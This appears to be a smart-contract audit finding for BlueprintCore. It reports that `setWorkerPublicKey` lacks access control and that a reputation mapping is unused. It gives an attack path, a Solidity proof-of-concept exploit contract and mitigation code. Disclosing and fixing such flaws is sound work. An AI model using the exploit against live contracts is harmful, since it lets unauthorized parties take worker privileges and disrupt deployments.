Uneven Gingerbread Ladybug

High

# Unrestricted Worker Registration and Unused Reputation System

### Summary

The `setWorkerPublicKey` function in BlueprintCore allows any address to register as a worker without permission checks or validation. Additionally, the contract defines a `workerReputation` mapping that is never used throughout the contract, indicating either incomplete or abandoned functionality. This issue could potentially allow malicious actors to register as workers, enabling them to participate in the deployment workflow, potentially accepting deployment requests or submitting fraudulent deployment proofs.

### Root Cause

The vulnerability stems from two design flaws:

1. The [`setWorkerPublicKey`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L689) function lacks access controls, allowing any address to call it and register as a worker.
2. The reputation system, which could have provided a defense-in-depth mechanism, is defined but never implemented.
```solidity
// @audit ayone can register as a worker
// @audit workerreputation mapping is not used
function setWorkerPublicKey(bytes calldata publicKey) public {
    if (workersPublicKey[msg.sender].length == 0) {
        workerAddressesMp[WORKER_ADDRESS_KEY].push(msg.sender);
    }

    workersPublicKey[msg.sender] = publicKey;
}
```

### Internal Pre-conditions

- The function must be publicly accessible (it is).
- No authorization modifiers are applied to the function.
- The contract must maintain a list of workers with special privileges.


### External Pre-conditions

- An attacker needs an Ethereum address with enough ETH to pay for gas.
- No additional prerequisites are needed, as the function allows direct registration.

### Attack Path

1. An attacker identifies the BlueprintCore contract.
2. They call `setWorkerPublicKey()` with any arbitrary bytes as the publicKey parameter.
3. If this is the first time the attacker's address is registering, they're added to `workerAddressesMp[WORKER_ADDRESS_KEY].`
4. The attacker's address is now registered as a worker in the system.
5. The attacker can now interact with worker-specific functionalities in the contract.

### Impact

- **Privilege Escalation:** Unauthorized actors can register as workers, gaining special privileges.
- **Deployment Manipulation:** Workers can submit deployment requests and proofs, potentially disrupting legitimate deployment processes.
- **Architectural Bypass:** The system's worker-based security model is effectively bypassed.
- **Reputation System Weakness:** The absence of a functioning reputation system prevents quality control of workers.

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

interface IBlueprintCore {
    function setWorkerPublicKey(bytes calldata publicKey) external;
    function getWorkerAddresses() external view returns (address[] memory);
}

contract WorkerRegistrationExploit {
    function exploit(address blueprintCore) external {
        // Any address can register as a worker
        bytes memory fakePublicKey = abi.encodePacked("malicious_key");
        IBlueprintCore(blueprintCore).setWorkerPublicKey(fakePublicKey);
        
        // Verify registration was successful
        address[] memory workers = IBlueprintCore(blueprintCore).getWorkerAddresses();
        bool registered = false;
        for (uint i = 0; i < workers.length; i++) {
            if (workers[i] == address(this)) {
                registered = true;
                break;
            }
        }
        require(registered, "Worker registration failed");
    }
}
```

### Mitigation

1. Implement Access Control:
```solidity
// Add role-based access control
bytes32 public constant ADMIN_ROLE = keccak256("ADMIN_ROLE");

function setWorkerPublicKey(bytes calldata publicKey) public {
    require(hasRole(ADMIN_ROLE, msg.sender) || isApprovedWorker(msg.sender), 
            "Caller is not authorized to register workers");
    
    if (workersPublicKey[msg.sender].length == 0) {
        workerAddressesMp[WORKER_ADDRESS_KEY].push(msg.sender);
    }
    workersPublicKey[msg.sender] = publicKey;
}
```
2. Implement Worker Reputation System:
```solidity
// Use the existing mapping
function updateWorkerReputation(address worker, uint256 score) public onlyAdmin {
    workerReputation[worker] = score;
}

function getWorkerReputation(address worker) public view returns (uint256) {
    return workerReputation[worker];
}

// Require minimum reputation for critical operations
function submitProofOfDeployment(...) public {
    require(workerReputation[msg.sender] >= MIN_REPUTATION, "Worker reputation too low");
    // Existing functionality...
}
```
3. Worker Whitelisting:
```solidity
mapping(address => bool) public approvedWorkers;

function approveWorker(address worker) public onlyAdmin {
    approvedWorkers[worker] = true;
}

function revokeWorker(address worker) public onlyAdmin {
    approvedWorkers[worker] = false;
}

function setWorkerPublicKey(bytes calldata publicKey) public {
    require(approvedWorkers[msg.sender], "Worker not approved");
    // Existing functionality...
}
```
**These improvements would significantly enhance the security model by ensuring only authorized entities can register as workers and by implementing the reputation system to control worker privileges based on performance.**
